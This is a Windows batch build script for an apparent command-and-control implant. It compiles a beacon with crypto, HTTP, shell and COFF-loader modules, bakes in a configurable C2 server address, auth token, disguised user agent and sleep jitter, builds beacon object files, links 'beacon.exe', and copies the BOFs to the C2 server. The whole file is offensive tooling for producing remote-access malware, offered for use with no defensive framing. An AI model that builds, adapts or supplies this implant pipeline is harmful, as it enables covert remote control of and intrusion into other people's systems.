@echo off
setlocal enabledelayedexpansion
echo ========================================
echo MinGW BOF Build Script
echo ========================================

:: ---------------------------------------------------------------------------
:: Arguments (all positional, all optional — defaults match config.h fallbacks)
::
::   %1  C2_SERVER_IP          e.g. 10.0.0.1         (default: 127.0.0.1)
::   %2  C2_SERVER_PORT        e.g. 443               (default: 8080)
::   %3  C2_USER_AGENT         e.g. "Mozilla/5.0"     (default: Mozilla/5.0)
::   %4  C2_AUTH_TOKEN         e.g. mysecrettoken      (default: empty)
::   %5  C2_SLEEP_BASE_MS      e.g. 10000             (default: 5000)
::   %6  C2_SLEEP_JITTER_MS    e.g. 5000              (default: 3000)
::   %7  C2_USE_HTTPS          1 or 0                 (default: 0)
::   %8  output filename       e.g. implant.exe       (default: beacon.exe)
::
:: Generated by `generate` in the C2 console, or call directly:
::   build.bat 10.0.0.1 443 "Mozilla/5.0" mytoken 10000 5000 0 beacon.exe
:: ---------------------------------------------------------------------------

set "ARG_IP=%~1"
set "ARG_PORT=%~2"
set "ARG_UA=%~3"
set "ARG_TOKEN=%~4"
set "ARG_SLEEP=%~5"
set "ARG_JITTER=%~6"
set "ARG_HTTPS=%~7"
set "ARG_OUT=%~8"

if "%ARG_IP%"==""      set "ARG_IP=127.0.0.1"
if "%ARG_PORT%"==""    set "ARG_PORT=8080"
if "%ARG_UA%"==""      set "ARG_UA=Mozilla/5.0"
if "%ARG_TOKEN%"==""   set "ARG_TOKEN="
if "%ARG_SLEEP%"==""   set "ARG_SLEEP=5000"
if "%ARG_JITTER%"==""  set "ARG_JITTER=3000"
if "%ARG_HTTPS%"==""   set "ARG_HTTPS=0"
if "%ARG_OUT%"==""     set "ARG_OUT=beacon.exe"

echo [*] Config:
echo     IP:      %ARG_IP%
echo     Port:    %ARG_PORT%
echo     UA:      %ARG_UA%
echo     Token:   %ARG_TOKEN%
echo     Sleep:   %ARG_SLEEP%ms  Jitter: %ARG_JITTER%ms
echo     HTTPS:   %ARG_HTTPS%
echo     Output:  %ARG_OUT%
echo.

:: ---------------------------------------------------------------------------
:: Directories
:: ---------------------------------------------------------------------------
set BOF_BUILD_DIR=build\bofs
set BUILD_DIR=build
set SERVER_BOF_DIR=..\server\bofs

if not exist "%BOF_BUILD_DIR%" mkdir "%BOF_BUILD_DIR%"
if not exist "%BUILD_DIR%"     mkdir "%BUILD_DIR%"

:: ---------------------------------------------------------------------------
:: Common compile flags — config injected via -D, no header-gen step needed
:: ---------------------------------------------------------------------------
set COMMON_FLAGS=-c -O2 -I include -I src -DBOF ^
  "-DC2_SERVER_IP=\"%ARG_IP%\"" ^
  -DC2_SERVER_PORT=%ARG_PORT% ^
  "-DC2_USER_AGENT=\"%ARG_UA%\"" ^
  "-DC2_AUTH_TOKEN=\"%ARG_TOKEN%\"" ^
  -DC2_SLEEP_BASE_MS=%ARG_SLEEP% ^
  -DC2_SLEEP_JITTER_MS=%ARG_JITTER% ^
  -DC2_USE_HTTPS=%ARG_HTTPS%

:: ---------------------------------------------------------------------------
:: 1. Beacon components
:: ---------------------------------------------------------------------------
echo [1/3] Compiling beacon components...

echo   crypto.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\crypto.c -o "%BUILD_DIR%\crypto.obj"
if !errorlevel! neq 0 (echo [!] Failed: crypto.c && exit /b 1)

echo   ecdh.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\ecdh.c -o "%BUILD_DIR%\ecdh.obj"
if !errorlevel! neq 0 (echo [!] Failed: ecdh.c && exit /b 1)

echo   http.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\http.c -o "%BUILD_DIR%\http.obj"
if !errorlevel! neq 0 (echo [!] Failed: http.c && exit /b 1)

echo   shell.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\shell.c -o "%BUILD_DIR%\shell.obj"
if !errorlevel! neq 0 (echo [!] Failed: shell.c && exit /b 1)

echo   beacon.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\beacon.c -o "%BUILD_DIR%\beacon.obj"
if !errorlevel! neq 0 (echo [!] Failed: beacon.c && exit /b 1)

echo   beacon_compatibility.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\beacon_compatibility.c -o "%BUILD_DIR%\beacon_compatibility.obj"
if !errorlevel! neq 0 (echo [!] Failed: beacon_compatibility.c && exit /b 1)

echo   COFFLoader.c
x86_64-w64-mingw32-gcc %COMMON_FLAGS% src\COFFLoader.c -o "%BUILD_DIR%\COFFLoader.obj"
if !errorlevel! neq 0 (echo [!] Failed: COFFLoader.c && exit /b 1)

:: ---------------------------------------------------------------------------
:: 2. BOFs
:: ---------------------------------------------------------------------------
echo [2/3] Compiling BOFs...

set BOF_FLAGS=-c -Os -fno-asynchronous-unwind-tables -fno-stack-protector -DBOF -I include

for %%f in (bofs\*.c) do (
    echo   %%~nf
    x86_64-w64-mingw32-gcc %BOF_FLAGS% %%f -o "%BOF_BUILD_DIR%\%%~nf.obj"
    if !errorlevel! neq 0 (echo [!] Failed: %%f && exit /b 1)
)

:: ---------------------------------------------------------------------------
:: 3. Link
:: ---------------------------------------------------------------------------
echo [3/3] Linking %ARG_OUT%...

x86_64-w64-mingw32-gcc ^
  "%BUILD_DIR%\crypto.obj" ^
  "%BUILD_DIR%\ecdh.obj" ^
  "%BUILD_DIR%\http.obj" ^
  "%BUILD_DIR%\shell.obj" ^
  "%BUILD_DIR%\beacon.obj" ^
  "%BUILD_DIR%\beacon_compatibility.obj" ^
  "%BUILD_DIR%\COFFLoader.obj" ^
  -o "%BUILD_DIR%\%ARG_OUT%" ^
  -lws2_32 -lbcrypt -lwinhttp -liphlpapi -lsecur32 -ladvapi32
if !errorlevel! neq 0 (echo [!] Link failed && exit /b 1)

:: ---------------------------------------------------------------------------
:: Deploy BOFs to server
:: ---------------------------------------------------------------------------
echo Deploying BOFs to server...
if exist "%SERVER_BOF_DIR%" (
    copy /Y "%BOF_BUILD_DIR%\*.obj" "%SERVER_BOF_DIR%\" >nul
) else (
    echo [!] Server BOF dir not found at %SERVER_BOF_DIR%, skipping deploy
)

echo.
echo ========================================
echo Build complete!
echo Beacon: %BUILD_DIR%\%ARG_OUT%
echo BOFs:   %BOF_BUILD_DIR%\
echo ========================================